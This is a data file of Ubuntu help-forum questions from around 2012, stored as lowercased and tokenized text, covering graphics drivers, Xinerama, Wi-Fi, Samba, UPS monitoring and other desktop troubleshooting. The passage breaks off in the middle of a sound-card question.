226746	how to setup dual head with `` radeon '' driver for r770 ?	i want to make dual head setup without xrandr but with xinerama . i put `` screen 1 '' line into xorg.conf , but card still show identical output on dvi-2 and dvi-3 it is important to use xinerama for me ( to glue three monitors ) , that 's why i decide not to use ranrd ( randr is incompatible with xinerama as i read somewhere ) here is my videocard ( hd 4850 x2 ) : lspci | grep r700 03:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati r700 [ radeon hd 4850 ] 04:00.0 display controller : advanced micro devices [ amd ] nee ati r700 [ radeon hd 4850 ] here is how monitors are connected : grep `` dvi '' /var/log/xorg.0.log [ 1210.002 ] ( ii ) radeon ( 0 ) : output dvi-0 using monitor section monitor0 [ 1210.048 ] ( ii ) radeon ( 0 ) : output dvi-1 has no monitor section [ 1210.079 ] ( ii ) radeon ( 0 ) : edid for output dvi-0 [ 1210.080 ] ( ii ) radeon ( 0 ) : printing probed modes for output dvi-0 [ 1210.128 ] ( ii ) radeon ( 0 ) : edid for output dvi-1 [ 1210.128 ] ( ii ) radeon ( 0 ) : output dvi-0 connected [ 1210.128 ] ( ii ) radeon ( 0 ) : output dvi-1 disconnected [ 1210.128 ] ( ii ) radeon ( 0 ) : output dvi-0 using initial mode 1920x1200 [ 1210.160 ] ( ii ) radeon ( 1 ) : output dvi-2 using monitor section monitor2 [ 1210.215 ] ( ii ) radeon ( 1 ) : output dvi-3 has no monitor section [ 1210.246 ] ( ii ) radeon ( 1 ) : edid for output dvi-2 [ 1210.247 ] ( ii ) radeon ( 1 ) : printing probed modes for output dvi-2 [ 1210.299 ] ( ii ) radeon ( 1 ) : edid for output dvi-3 [ 1210.300 ] ( ii ) radeon ( 1 ) : printing probed modes for output dvi-3 [ 1210.300 ] ( ii ) radeon ( 1 ) : output dvi-2 connected [ 1210.300 ] ( ii ) radeon ( 1 ) : output dvi-3 connected [ 1210.300 ] ( ii ) radeon ( 1 ) : output dvi-2 using initial mode 1920x1200 [ 1210.300 ] ( ii ) radeon ( 1 ) : output dvi-3 using initial mode 1920x1200 here is my /etc/x11/xorg.conf section `` serverflags '' option `` randr '' `` 0 '' option `` xinerama '' `` 1 '' endsection section `` serverlayout '' identifier `` three head layout '' screen `` myprecious0 '' screen `` myprecious2 '' rightof `` myprecious0 '' screen `` myprecious3 '' leftof `` myprecious0 '' endsection section `` screen '' identifier `` myprecious0 '' monitor `` monitor0 '' device `` device300 '' endsection section `` screen '' identifier `` myprecious2 '' monitor `` monitor2 '' device `` device400 '' endsection section `` screen '' identifier `` myprecious3 '' monitor `` monitor3 '' device `` device401 '' endsection section `` device '' identifier `` device300 '' busid `` pci:3:0:0 '' screen 0 driver `` radeon '' endsection section `` device '' identifier `` device400 '' busid `` pci:4:0:0 '' screen 0 driver `` radeon '' endsection section `` device '' identifier `` device401 '' busid `` pci:4:0:0 '' screen 1 driver `` radeon '' endsection section `` monitor '' identifier `` monitor0 '' endsection section `` monitor '' identifier `` monitor2 '' endsection section `` monitor '' identifier `` monitor3 '' endsection i tried to switch to vesa driver ( did n't work for me ) i tried to add options like option `` zaphodheads '' `` dvi-2 '' and option `` zaphodheads '' `` dvi-3 '' into sections `` device 400 '' and `` device 401 '' ( this did n't help because `` zaphodheads '' option is for ranrd , and randr is disabled by decision ) i tried to merge sections `` device 400 '' and `` device 401 '' into one section and add option `` zaphodheads '' `` dvi-2 , dvi-3 '' ( see comment about randr above ) single section setup helps to change log line radeon ( 1 ) : output dvi-3 has no monitor section into radeon ( 1 ) : output dvi-3 using monitor section monitor3 but nothing was enough to switch from screen cloning to separate screens . ( mergedfb has now been completely replaced by randr ) this problem ( lack of documentation on radeon driver ) is similar to these : radeon display driver clones monitors while using xinerama ( moderators decision to close that problem was wrong ) the problem is solvable , because this hardware worked as three headed for me earlier with gentoo/xorg-server-1.3 xorg -configure creates setup for the first monitor on the first gpu please do n't advise to use fglrx/aticonfig/amdcccle ( this goes against my religion beliefs )
226750	pressing p in dash results in weird b	today i tried to open skype in my dash and discovered that my `` p '' key does not work properly . instead of p i get b . in every other application the key works properly . when i copy the text `` skybe '' from dash into another application it sais `` skype '' . i tried every other character and they seem fine , it 's only the `` p '' key . i think that the problem is dash . anyone else has the same problem ? here is an image . i enter `` skype '' and get this : what causes this problem and how can i fix it ? environment : lenovo w500 with german keyboard ubuntu 12.10 language settings : english keyboard layout : german
226751	radeon hd4850 card , ubuntu 12.04.1 lts installed fglrx drivers , but still running vesa , how to solve it ?	i have an ati hd4850 card , ubuntu 12.04.1 lts . to begin with , after a fresh install , i installed fglrx drvers from system -- additional drivers , according to fglrxifo everything was alright , but the system was running on vesa : sem . after that , i have reinstalled and installed drivers according to many tutorials , but still got that problem . one of the tutorials was here : what is the correct way to install ati catalyst video drivers ( fglrx ) ? of course , i attempted to install 12.6 driver now i have a fresh install of ubuntu and do n't want to touch anything without anyone 's support , because my 3 days nightmare did n't give results . what must i do to have an adequate performance of video card ? thanks in advance .
226755	how to open nautilus at current command line directory ?	i was wondering if anybody knew a command that would allow me to open a nautilus ( if that 's the right name for the ubuntu 12.04 graphic/window explorer ) window from the command line at the current directory that the user is at . so , if i open a command line , and type : cd /home/myuser/some/long/path/to/a/directory then , i 'd like to be able to issue some command : nautilus open-sesame and have a graphic window opened to /home/myuser/some/long/path/to/a/directory . is this even possible ? thanks in advance .
226756	`` default '' button in lubuntu 's notification area	i 've just installed dropbox in lubuntu and i got the popup notification telling me that i 've linked a new computer to my dropbox account . however , instead of clicking on the `` x '' in the upper right corner of the notification box , i clicked on the `` default '' button , but apparently nothing happened . what is the purpose of that button ?
226758	screen resolution of a command line terminal ?	i have disabled the automatic boot into unity and am booting into a cli tty with a login shell . while running the cli login shell the screen resolution is fairly low and only utilizes a tiny portion of my widescreen . i do want to maximise the screen resolution but keep the fonts small . i am actually running this particular install in a virtual machine inside virtualbox but will also apply it later to other `` bare metal '' installs on other machines .
226763	12.10 automatically 64 bit after upgrade ?	i have the 32-bit version of 12.04 lts . if i upgrade my machine to 12.10 , does it automatically turn into a 64-bit os ? thanks !
226767	pirateplayer not able to install , old repository for qt desktop components !	i have a slow connection so i used to have pirateplayer to download programs from svt.se but after update to ubuntu 12.10 it wont be able to install . it wont compile because the repository only updated for ubuntu 12.04 `` precise '' is there some way i can use the files in precise repository instead ? edit : the failing ppa is ppa : forumnokia/fn-ppa - it should be related to qt desktop components as i understand from a contact with the developer of the application . here are the instruction from the website http : //pirateplay.se/player.html : wget `` http : //pirateplay.se/static/tidy-html5_20120402-1git-1_i386.deb '' wget `` http : //github.com/downloads/jackuess/pirateplayer/pirateplayer_0.4.5-1_i386.deb '' sudo aptitude remove tidy sudo dpkg -i tidy-html5_20120402-1git-1_i386.deb sudo add-apt-repository ppa : forumnokia/fn-ppa sudo add-apt-repository ppa : jon-severinsson/ffmpeg sudo aptitude update sudo aptitude upgrade sudo aptitude install qt-components-desktop libqtcore4 libqt4-declarative libqt4-script libqt4-sql libqt4-xmlpatterns libqtgui4 libqt4-xml libqt4-network librtmp0 ffmpeg libarchive sudo dpkg -i pirateplayer_0.4.5-1_i386.deb
226769	how to update systemc ?	i have installed systemc 2.2 on ubuntu 10.10 by following the instructions on this blog post . i want to remove systemc 2.2 and install systemc 2.3 for its support of tlm library . so could someone help me remove v2.2 and install v2.3 such that there is no conflict or any other problem because of the earlier older version .
226770	is there a shell-independent search tool like the unity 's dash ?	the only thing i will miss after moving to lxde from unity will be the unity dash . its functionality , not the piss-poor performance that is . so here 's my question . i know there is synapse but afaik it only returns text , without multiple large-sized thumbnails of files etc . i 'm looking for a tool : that uses relatively large area to present results with thumbnailing capability with immediate presentation of recently used files and apps , preferably hence i do not look for any launcher . point 's no . 1 and 2 make for sufficient replacement . please do n't be afraid to answer 'no , there are none ' if there no alternatives similar to unity dash or gnome shell activities exist . related question : any search tool for lxde menu ?
226773	how to read mp3 tags in shell ?	is there a way to read the mp3 tags of a file from the shell ? something like : mp3tags myfile.mp3 author should output the author-tag of an mp3-file .
226780	unity mail handling multiple accounts	i 've configured unity mail so it monitors 2 email accounts ( say , gmail and mail.ru ) . it correctly notifies me about new messages , but when i click on an unread message it either redirects me to gmail or does nothing in the case of mail.ru . is there a possibility of configuring unity mail so it can handle different redirect pages with the respect to email accounts ?
226781	problems importing own ca certificate	so , i have created my own little ca for my own purposes ( inside my network , etc ) and i know that the setup works ( i can directly import the key into applications , and they connect to the server using the key fine ) . but ! when i tried to import the ca certificate so that all applications can use it , they do n't ( firefox and chromium ) i have placed the cacert.pem in /etc/ssl/certs and ran update-ca-certificates and dpkg-reconfigure ca-certificates directly placed the cert inside the ca-certificates.crt file ( as it was n't being placed in there inspite of the previous commands ) i 'm stumped . info : ubuntu desktop , 12.04 x64 cat cacert.pem -- -- -begin certificate -- -- - miidcdccang -- snip -- 8gukjuzt -- -- -end certificate -- -- - openssl x509 -in cacert.pem -noout -text certificate : data : version : 3 ( 0x2 ) serial number : 1xxxxxxxxxxxxxxxxxx3 ( 0xxxxxxxxxxxxxxx9 ) signature algorithm : sha1withrsaencryption issuer : c=au , st=western australia , l=xx , o=xx , ou=webmasters , cn=haven/emailaddress=xx validity not before : dec 8 11:47:37 2012 gmt not after : dec 6 11:47:37 2022 gmt subject : c=au , st=western australia , l=xx , o=xx , ou=webmasters , cn=haven/emailaddress=xx subject public key info : public key algorithm : rsaencryption public-key : ( 1024 bit ) modulus : 00 : xx:5b exponent : 65537 ( 0x10001 ) x509v3 extensions : x509v3 subject key identifier : 38 : xx:95 x509v3 authority key identifier : keyid:38 : xx:95 x509v3 basic constraints : ca : true signature algorithm : sha1withrsaencryption 7b : xx : d3 thanks in advance !
226784	flightgear starts then chrashes	i have installed flightgear but when i type fgfs in terminal it starts loading but when it is almost done loading it crashes with this error : failure to revalidate bos - badness fgfs : ../../radeon/radeon_cs_gem.c:181 : cs_gem_write_reloc : assertion `boi- > space_accounted ' failed . aborted ( core dumped )
226788	dell inspiron 5720 battery manager ?	is there anything like battery charge manager in ubuntu 12.04 for my dell inspiron 5720 ? i mean some program , that i can set so that it stops laptop from charging when it 's above 80 % of battery charge and which starts charging when it 's below 50 % without unplugging my cable . i heard it can let my battery live longer . thanks alot !
226789	auto reconnect to wi-fi	when i open my laptop , it takes about 5 sec to reconnect to the wi-fi network . is there a way for a faster connection ? maybe configure it to not disconnect when i close laptop ?
226799	how do i set it such that dvds and cds autorun ?	as per title , i 'd like to know how in 12.10 you set it such that dvds and cds autorun .
226806	how to trigger anacron start if usb drive connected	there is a script in /usr/lib/pm-utils/power.d/anacron which restarts anacron if leptops are connected to power . is it possible to have a similar script restart anacron if ( a certain ) usb-drive is connected , and how ? i want to start the backup to my usb-drive using anacron .
226809	how to install/run world of warcraft on ubuntu 12.04.1 ?	on my windows 7 i have a game called 'world of warcraft ' ... . and because i do n't use windows i want to install world of warcraft on my ubuntu but the problem it i do n't know how ... i have a winrar file with the original game itself and i do n't know what to do with it . i have the 'play on linux ' app installed too ... but what do i do ? does anybody know how to solve my problem ?
226810	monitor getting weird after a while	i got this problem i 've been trying to solve for a while now . if i leave my computer unattended for maybe half an hour my monitor turns black and pops an errorbox complaining that my resolution is wrong ( wich it is n't ) . i 've tried and turn off screenlock , screensaver and just about anything i could think off but nothing has helped ? my monitor is a samsung syncmaster 912n and my computer is a dell optiplex 170l . i 've attached my graphics specs . does anyone know how to fix this it would be greatly appreaciated ! /alex ! ( http : //ubuntu.se/attachment.php ? attachmentid=5134 & d=1351805185 )
226816	background setting - cropping options	when setting a wallpaper you can choose from tile , zoom , center , scale , fill or span options . what do they mean ? how scale option is different from zoom and span ? i ca n't see the difference on any of my wallpapers .
226817	how to adjust irq priority in ubuntu 12.04 ?	the question says it all . i see some tutorials online for earlier editions of ubuntu , but am having a hard time for 12.04 .
226818	how to uninstall gmail webapp ?	i want to uninstall the gmail webapp , and i tried both the ways given in this question , yet still i 'm unable to . when i searched the software centre for unity-webapps-gmail , i saw that it was n't installed . and the `` allowed-domains '' in dconf-editor had no website . the gmail icon shows up here under the messaging menu , and opens gmail in firefox when clicked . how do i unistall the gmail web-app so that it no longer appears in the messaging menu ?
226822	make a .deb for a node.js application	how i make a .deb for a node.js application that installs node.js and its required npm modules on dpkg -i ? which is the place in the filesystem where i have to put this application ? ( /opt , /usr/local ) . thanks in advance .
226826	setting up ups monitoring	i have acquired a second hand uninterrupted power supply ( ups ) that i have refurbished ( new battery ) and hope to use with my ubuntu 12.10 system . it 's a sola 330 with serial out . i have installed nut metapackage and nut monitor from software centre , but am not sure how to go about setting it all up . a google search brings up several ways of configuring network ups tools ( nut ) or hal-drivers , however , hal-drivers appears to be obsolete and many commands and config files mentioned to edit do not exist in 12.10 or the current version of nut ( most articles are a few years old ) . one tutorial seemed to work except the error : no ups definitions found in ups.conf even though ups.conf has values in it as laid out in the tutorial . how do i go about setting my system to monitor the ups for a shut down signal ? also , is there a command to determine the ups is communicating through the serial connection and on what port ( to help with setup and configuring , eg . /dev/ttys0 is mentioned in one of the tutorials i read ) .
226827	problem grub wo n't display on my tv at boot up	when i start my computer it wo n't show my grub screen this box just appears saying something along the lines of `` this tv can not handle this resolution or refresh rate '' but after a couple seconds it brings me to the log in screen . any idea what exactly the problem is and how do i fix it ? thanks !
226828	how to tweak unity panel bgcolor in ubuntu 12.10 ?	currently in ubuntu 12.10 we have very few gtk3 themes upgraded to version 3.6 in addition to the default ambiance theme . when you maximize an application window , you have only the toolbar below the unity panel , which assumes the functionality of both title and menubars . but this may create a problem in some themes where the bgcolor of the unity panel does not match very well with the bgcolor of the toolbar . for example , greybird theme does n't have this problem , and it has the following code in `` unity.css '' : .unity-panel { background-image : -gtk-gradient ( linear , left top , left bottom , from ( shade ( @ theme_bg_color , 1.2 ) ) , to ( shade ( @ theme_bg_color , 1.0 ) ) ) ; but another theme has this code in `` gtk-apps.css '' : .unity-panel { background-image : -gtk-gradient ( linear , left top , left bottom , from ( shade ( @ theme_bg_color , 1.1 ) ) , to ( @ toolbar_gradient_start ) ) ; and this produces a unity panel much lighter than the toolbar unlike greybird . and using greybird 's code or changing the value 1.1 does n't make any difference . the questions is ; how can i make the second theme have a unity panel with a darker grey bgcolor ?
226829	how to take screenshot of an x11 based gui from a text terminal ( such as tty1 ) ?	i tried using display=:0 import -window root `` $ home/pictures/screenshot.png '' ( import is part of the imagemagick suite ) , but that just displays a black screen . i want to do this as i wanted to automate opening an app and taking screenshots of it in different languages , and to change languages , i need to restart lightdm . therefore , run on a tty so your script continues running ...
226833	digi pro pen tablet 640 drivers	i have a digi pro pen tablet 640 . i used to use it with windows . but my windows sucked so i switched to ubuntu . is there a way to install the drivers into ubuntu ? there is no ubuntu drivers provided so i was going to try this windows wireless drivers program . but i do n't know how to use it . can anyone help me ? i have the windows drivers though !
226834	create ppa source package from existing .deb package	i wan na modify some files in .deb package and upload it to my ppa , is that possible and how to ? thanks in advance
226838	looking for a customizable `` did you know ... '' dialog application	i want to deploy a `` did you know ... '' or `` tip of the day '' application at the office . it should : show a dialog at login time with a random tip . obviously , provide some way to store my own tips . be easy to disable and reenable by the user itself . i 'm using puppet , so i 'm covered with the deployment . the tips do n't even need to be gathered from a server , since i can deploy the newest tips file/database with no costs . sure , i could hack a quick solution by using zenity and bash , but i 'd like to know if there 's any application out there specifically targeted at this . i do n't like the zenity approach very much because it 's very limited on the contents that can be displayed . no text alongside screenshots , for example . zenity is aimed towards displaying simple dialogs .
226839	how do i fix a noisy input device ( internal mic ) ? snd_hda_intel - debug included	as the title says , i 'm having trouble with a very noisy audio input device - the internal mic or any plugged in mics . so far i 've narrowed it down to an problem in alsa since my debug info is showing a lot of `` null '' values . can anyone help ? debug info : http : //www.alsa-project.org/db/ ? f=e0c6fb7e10624bf7691aa2b405cf0d3968e56c63 exert from the debug : model : ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null )
226840	how to install g++ and openjdk from .deb package	i have recently started using ubuntu 12.04 for my dell inspiron 5500 15r . i want to install g++ and javac on my ubuntu.since my usb modem does n't support ubuntu i can not connect my ubuntu to the internet.i have the .deb package of g++-4.4 gnu c++ compiler and openjdk java 6 runtime with me . please explain to me in detail how to install them to my ubuntu . thank you saurav shekhar
226844	can i downgrade 12.10 back to 12.04 ?	i have had nothing but problems with my box since i upgraded to 12.10 . i 'd like to go back to 12.04 ( i had no problems at all ) - is this possible ?
226847	dell xps 15z wireless ( centrino n 6230 ) intermittent slow-downs	problem description and background once every second or third page load , my wireless internet connection seems to lag out for about 10-15 seconds and then finally , the page loads . it 's making me feel like i 'm back in the dial up days with a 56k modem . i 've seen all the known issues with this particular wifi card on the ubuntu community wiki . none of those potential solutions worked for me . for reference : https : //wiki.ubuntu.com/hardwaresupport/machines/laptops/dell/xps/15z here is all the relevant debug information , if you require more to assist in troubleshooting , please comment and i will update the question with an answer . information dell xps 15z ubuntu 12.04 centrino n-6230 wireless card details / read-outs $ sudo lshw -c network *-network description : wireless interface product : centrino advanced-n 6230 vendor : intel corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 34 serial : 88:53:2e:5c:93 : fb width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.2.0-34-generic-pae firmware=18.168.6.1 ip=192.168.0.11 latency=0 link=yes multicast=yes wireless=ieee 802.11abg resources : irq:24 memory : f1b00000-f1b01fff *-network description : ethernet interface product : ar8151 v2.0 gigabit ethernet vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:06:00.0 logical name : eth0 version : c0 serial : 84:8f:69 : b2:62 : ca capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vpd bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=atl1c driverversion=1.0.1.0-napi firmware=n/a latency=0 link=no multicast=yes port=twisted pair resources : irq:27 memory : f1800000-f183ffff ioport:2000 ( size=128 ) $ rfkill list all 1 : dell-wifi : wireless lan soft blocked : no hard blocked : no 2 : dell-bluetooth : bluetooth soft blocked : no hard blocked : no 9 : phy0 : wireless lan soft blocked : no hard blocked : no 11 : hci0 : bluetooth soft blocked : no hard blocked : no $ lspci 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation xeon e3-1200/2nd generation core processor family pci express root port ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 00:16.0 communication controller : intel corporation 6 series/c200 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 ( rev 05 ) 00:1b.0 audio device : intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 05 ) 00:1c.0 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 1 ( rev b5 ) 00:1c.1 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 2 ( rev b5 ) 00:1c.3 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 4 ( rev b5 ) 00:1c.4 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 5 ( rev b5 ) 00:1c.5 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 6 ( rev b5 ) 00:1d.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 ( rev 05 ) 00:1f.0 isa bridge : intel corporation hm67 express chipset family lpc controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 6 series/c200 series chipset family 6 port sata ahci controller ( rev 05 ) 00:1f.3 smbus : intel corporation 6 series/c200 series chipset family smbus controller ( rev 05 ) 01:00.0 vga compatible controller : nvidia corporation gf108 [ geforce gt 540m ] ( rev ff ) 03:00.0 network controller : intel corporation centrino advanced-n 6230 ( rev 34 ) 04:00.0 usb controller : nec corporation upd720200 usb 3.0 host controller ( rev 04 ) 06:00.0 ethernet controller : atheros communications inc. ar8151 v2.0 gigabit ethernet ( rev c0 )
226851	trouble running ubuntu12.04 on msi cx620	hardware a few days ago i uninstalled windows 7 & installed ubuntu 12.04 lts on my laptop ( msi cx620 ) . no problems occurred in installation process . my laptop contains two graphic controllers 1 ) ati radeon hd5470 . 2 ) integrate chipset ( intel core i3-330m ) . problems system is running very slow not able to run unity3d only 2d laptop becomes very hot in short period of time ( 1.5 hours , 100c ) what i think is wrong : only integrated chipset is used , more powerful ati radeon is not recognized and not used . can somebody help me determine the problem . i 'm not a very experienced linux user . attached some information that might help : output sudo lshw : http : //pastebin.com/nu2cbuyl pic system details graphics : http : //i47.tinypic.com/f3ued3.jpg thanks in advance !
226857	gtk-warning when loading gedit from shell	i 've just upgraded from 12.04 to 12.10 . do n't know why but i can never avoid upgrading . anyway , every time i load gedit from the sehll i get this : ( gedit:2696 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:85:17 : not using units is deprecated . assuming 'px ' . ( gedit:2696 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:196:17 : not using units is deprecated . assuming 'px ' . ( gedit:2696 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:234:17 : not using units is deprecated . assuming 'px ' . ( gedit:2696 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:295:17 : not using units is deprecated . assuming 'px ' . ( gedit:2696 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:332:17 : not using units is deprecated . assuming 'px ' . it goes on and on , i did n't want to post it all as it is too long . i remember having a similar problem before that i fixed by installing get2-engines-pixbuf , but it is already installed . any ideas ? thanks
226862	problems with wireless internet connection with 12.10 and atheros ar9287	i recently installed ubuntu 12.10 on a gateway nv53a laptop . i find that when using a wireless connection rather than a lan cable , my internet connection is very slow and unstable . normal speeds are about 15-20mb/s , but with wireless , speeds tend to be 0.5-2mb/s . this only seems to happen in ubuntu 12.10 . wi-fi works fine in windows 7 , and has worked fine in windows 8 , previous versions of ubuntu , linux mint , and lubuntu . the wireless card is an atheros ar9287 wireless network adapter .
226864	12.10 unable to install ati drivers	i 've tried for litterally hours to get my amd ati drivers installed . this seems to be a populair problem as it has been asked a lot here and i 've tried everything i found . nothing does it . either i lose unity completely , either i 'm stuck with an inferior resolution and have no options to change it or i get a `` for testing use only '' watermark . i 've tried with the official drivers , both with the regular installation and by generating a .deb for my distribution . i 've tried with an unofficial ppa available here . no chance . does any one have an idea how i can get this working ?
226865	mouse double click is not opening data files with the correct application	when i installed apache openoffice software successfully and with the help of gnome package i created a short launchers of openoffice the icon is working . i open a scalc or writer and save a data file but when i double click the file direct it does not open the application . i tried several times .
226867	is there a tool for validating /etc/network/interfaces files ?	i always like to test new config files before deploying them -- with tools like apachectl configtest and named-checkconf . it 's rare that mistakes crop up , but catching them before deployment eliminates any impact . the one that has bit me in the backside several times is /etc/network/interfaces ; i ca n't seem to find a tool to test it , and restarting the network on a remote machine only to discover it 's no longer reachable is quite annoying -- especially when we use a lot of bonding and bridging .
226868	keepass 2 does n't show any files present on a pendrive	i keep my keepass 2.x databases and their respective keyfiles in a pendrive , to be able to open them in any pc . whenever i want to open a database , first i have to execute keepass 2 , then navigate to the folder , right-click on the .kbdx file and select open with keepass and after that i have to copy the keyfile to my home directory , because keepass does n't display any files present in the pendrive on the `` open database file '' window , it does only if these files are anywhere in the home folder ( as shown in this screenshot ) . i would prefer to just open them directly from the pendrive via keepass if possible .
226873	how do i remove the unity 2d option in lightdm ( login sceen ) in ubuntu 12.04 ?	because i wish to view my full username at login , i want to remove the `` unity 2d '' option at the login screen . currently the last part of the username ( after the 20th digit ) is hidden behind the ubuntu-icon which enables switching to unity 2d . another option would be to decrease the font-size of the username , is any of this possible ? btw this is not an issue in ubuntu 12.10 , where the username font-size is smaller , and unity 2d unsupported !
226874	how to manually recheck for available network devices ?	i use a dsl cable modem for connecting internet . many a times it happens that the modem is turned off due to some problems by my isp , and is started after sometime . now the problem is that every time the modem goes off , the network manager shows no devices detected and i am forced to restart my pc in order to detect the modem . i want a way i can keep on checking if the network device is found ( working ) without restarting . is there a way to do so ? thanks .
226875	how do i fix update-manager exception crash ?	for some reason , maybe because of a manual shutdown of my computer , update manager has stopped working . when i hit the `` update '' button , the program freezes , turns grey , and i get a `` report a problem '' pop-up . the only way to exit it from there is with gnome-system-monitor or xkill . i can still preform upgrades through apt-get . it is , however , annoying , because not only does this affect update-manager , but i can not install programs from ubuntu software center . i started update-manager from terminal . here is the output : ryansw @ rpc1 : ~ $ update-manager traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/defer/__init__.py '' , line 475 , in _inline_callbacks result = gen.send ( result ) file `` /usr/lib/python2.7/dist-packages/aptdaemon/client.py '' , line 1622 , in _run_transaction_helper daemon = get_aptdaemon ( self.bus ) file `` /usr/lib/python2.7/dist-packages/aptdaemon/client.py '' , line 1696 , in get_aptdaemon false ) , file `` /usr/lib/python2.7/dist-packages/dbus/bus.py '' , line 241 , in get_object follow_name_owner_changes=follow_name_owner_changes ) file `` /usr/lib/python2.7/dist-packages/dbus/proxies.py '' , line 248 , in __init__ self._named_service = conn.activate_name_owner ( bus_name ) file `` /usr/lib/python2.7/dist-packages/dbus/bus.py '' , line 180 , in activate_name_owner self.start_service_by_name ( bus_name ) file `` /usr/lib/python2.7/dist-packages/dbus/bus.py '' , line 278 , in start_service_by_name 'su ' , ( bus_name , flags ) ) ) file `` /usr/lib/python2.7/dist-packages/dbus/connection.py '' , line 651 , in call_blocking message , timeout ) dbus.exceptions.dbusexception : org.freedesktop.dbus.error.spawn.childexited : launch helper exited with unknown return code 1 traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/defer/__init__.py '' , line 475 , in _inline_callbacks result = gen.send ( result ) file `` /usr/lib/python2.7/dist-packages/aptdaemon/client.py '' , line 1622 , in _run_transaction_helper daemon = get_aptdaemon ( self.bus ) file `` /usr/lib/python2.7/dist-packages/aptdaemon/client.py '' , line 1696 , in get_aptdaemon false ) , file `` /usr/lib/python2.7/dist-packages/dbus/bus.py '' , line 241 , in get_object follow_name_owner_changes=follow_name_owner_changes ) file `` /usr/lib/python2.7/dist-packages/dbus/proxies.py '' , line 248 , in __init__ self._named_service = conn.activate_name_owner ( bus_name ) file `` /usr/lib/python2.7/dist-packages/dbus/bus.py '' , line 180 , in activate_name_owner self.start_service_by_name ( bus_name ) file `` /usr/lib/python2.7/dist-packages/dbus/bus.py '' , line 278 , in start_service_by_name 'su ' , ( bus_name , flags ) ) ) file `` /usr/lib/python2.7/dist-packages/dbus/connection.py '' , line 651 , in call_blocking message , timeout ) dbus.exceptions.dbusexception : org.freedesktop.dbus.error.spawn.childexited : launch helper exited with unknown return code 1 dbus.exceptions.dbusexception : org.freedesktop.dbus.error.spawn.childexited : launch helper exited with unknown return code 1 traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/defer/__init__.py '' , line 473 , in _inline_callbacks result = gen.throw ( result.type , result.value , result.traceback ) file `` /usr/lib/python2.7/dist-packages/updatemanager/backend/installbackendaptdaemon.py '' , line 52 , in commit downgrade , defer=true ) dbus.exceptions.dbusexception : org.freedesktop.dbus.error.spawn.childexited : launch helper exited with unknown return code 1 thanks in advance . : )
226876	samba passwords do n't sync	first , this is a debian wheezy issue . i just switched from ubuntu to debian . i took my smb.conf file with me but samba dose n't work as expected . before today , i could just add a user and then log onto his share on samba with his unix password . now , i have to create a samba user too with smbpasswd . this is my smb.conf . any ideas ?
226877	how do i let other users access my /media/ [ username ] /harddrive with ubuntu 12.10 ?	i am trying to let other users access my external 1tb ntfs hard drive mounted automatically at /media/ [ username ] /storage the problem is that by default , udisk2 ( present with ubuntu 12.10 ) automatically creates : /media/ [ username ] with chown : root : root and chmod : 700 /media/ [ username ] /storage with chown : [ username ] : [ username ] and chmod : 700 therefore no other user can access it , not even the upnp server if it is running as a different user than [ username ] . of course i could , just chmod everything this time but if i umount and mount then the default permissions will be back on and i 'll have the same issue . the answer probably has to do with a permissions to add in /etc/udev/rules.d/ but i am not an expert . can you help ?
226878	no sound on toughbook cf 51	i just got my cf 51 here and i was installing ubuntu 12.10 on it . though it seems like the system knows what audio devices are in there ( lspci shows them ) , i dont have any sound . lspci : 00:1e.2 multimedia audio controller : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) ac'97 audio controller ( rev 04 ) whatever , when im trying to connect a headphone jack , i hear sound , but its very , very quiet . i have no idea what i could do to have it working . any clues , maybe ? more information : [ root @ toughbook-cf-51lcrdlbg : /home/toughbook ] # hwinfo -- sound > hal.1 : read hal dataprocess 18030 : arguments to dbus_move_error ( ) were incorrect , assertion `` ( dest ) == null || ! dbus_error_is_set ( ( dest ) ) '' failed in file ../../dbus/dbus-errors.c line 282 . this is normally a bug in some application using the d-bus library . libhal.c 3483 : error unsubscribing to signals , error=the name org.freedesktop.hal was not provided by any .service files 18 : pci 1e.2 : 0401 multimedia audio controller [ created at pci.318 ] unique id : r0vg.+hpozcxsu0c sysfs id : /devices/pci0000:00/0000:00:1e.2 sysfs busid : 0000:00:1e.2 hardware class : sound model : `` intel 82801fb/fbm/fr/fw/frw ( ich6 family ) ac'97 audio controller '' vendor : pci 0x8086 `` intel corporation '' device : pci 0x266e `` 82801fb/fbm/fr/fw/frw ( ich6 family ) ac'97 audio controller '' subvendor : pci 0x10f7 `` matsushita electric industrial co. , ltd. '' subdevice : pci 0x8346 revision : 0x04 driver : `` oss_ich '' driver modules : `` oss_ich '' i/o ports : 0x1c00-0x1cff ( rw 